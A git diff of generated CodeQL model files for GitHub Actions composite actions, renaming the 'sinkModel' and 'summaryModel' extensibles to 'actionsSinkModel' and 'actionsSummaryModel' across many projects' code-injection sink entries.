--- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/opendal", "*", "input.feature", "code-injection", "generated"]
 - ["apache/opendal", "*", "input.setup", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml
index c49315d791a9..dcb93d013a09 100644
--- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/pekko", "*", "input.upload", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml
index f58fcf336fcd..4776bb79067e 100644
--- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"]
 - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml
index 4812eaa5b4a3..2540e6a76ca7 100644
--- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml
index de8c3e1b7259..525064de6a97 100644
--- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml
+++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"]
 - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml
index dee268884a14..b46d5a3ee6a8 100644
--- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml
+++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"]
 - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml
index 5e0e51583902..631457c813e4 100644
--- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml
+++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml
index bb4b41a05928..44d9eb10a0dc 100644
--- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml
+++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml
index ef3a84762dbf..0d7f80698f57 100644
--- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml
+++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"]
 - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml
index 425242bf220e..84caa0434846 100644
--- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml
+++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"]
 - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml
index 62f1ed005edc..f6aed253a21d 100644
--- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml
+++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"]
 - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml
index 098b460bbd87..1eac49617f22 100644
--- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml
+++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml
index d5a257be220a..1efa6815c280 100644
--- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml
+++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"]
 - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml
index 53c6258551f4..91463a305dd9 100644
--- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml
+++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml
index 62a4f2bbcd7b..7ef240ad999c 100644
--- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml
+++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
index 6dffbff40d31..db953acf5bc7 100644
--- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
+++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml
index ac72bb9ebf04..7c1b01e14b5a 100644
--- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml
+++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"]
 - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml
index b3f1ca67eef7..37b67a933a3a 100644
--- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml
+++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"]
 - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml
index 44f5ad660960..570a9bdd142c 100644
--- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml
+++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"]
 - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml
index c2e56f7e175c..8c1993c47ca6 100644
--- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml
+++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml
index 54d0c8b2fe09..ee0adaadb3e2 100644
--- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml
+++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"]
 - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml
index b1914e7a96b5..c127f03bb66d 100644
--- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml
+++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"]
 - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml
index dd66f206ee99..3b3d60fadd03 100644
--- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml
+++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml
index 0c26f02e6d86..4dd43acd2c53 100644
--- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml
+++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml
index 2ee13115d6d9..cb4bff25f9ac 100644
--- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml
+++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index c76ed5b66045..39a204389b99 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 0bdf2087b46a..6b4192c0c616 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index bb83a5964e7c..63c3fc89058b 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index f29c52b1bf5b..72772ae47cf7 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 43745006f8db..43cc1e0187ea 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 9289afb744f9..7c80b7e6eda6 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 9729f9668138..1f7b69e6254a 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 92c259539443..7879a7903b41 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index c572c11ada4b..dbbd4c720ca4 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index 1819f4f716e1..f99698b19924 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index 620100dd2d9a..a98a135d6b43 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index dfb08d260583..3ebb5e7acb32 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index a99ccc9e4776..b26aa6ea48b3 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 3a1e7b9d3366..683965e13d20 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index c15c1fac0068..9358c895f3c2 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index b0c787fa378f..8233e5066033 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 86278889fdf1..2aea730db7e3 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 4bf92a251235..b03d23918825 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 79c13504faba..9db70f02db4e 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 45ac61c8ef9d..8cea15ac9e11 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index ce546fceb4bb..766ec5155517 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index b34c6d46da3a..13ee2f4e7a87 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index f87e0c02529c..0cf05c2273bd 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 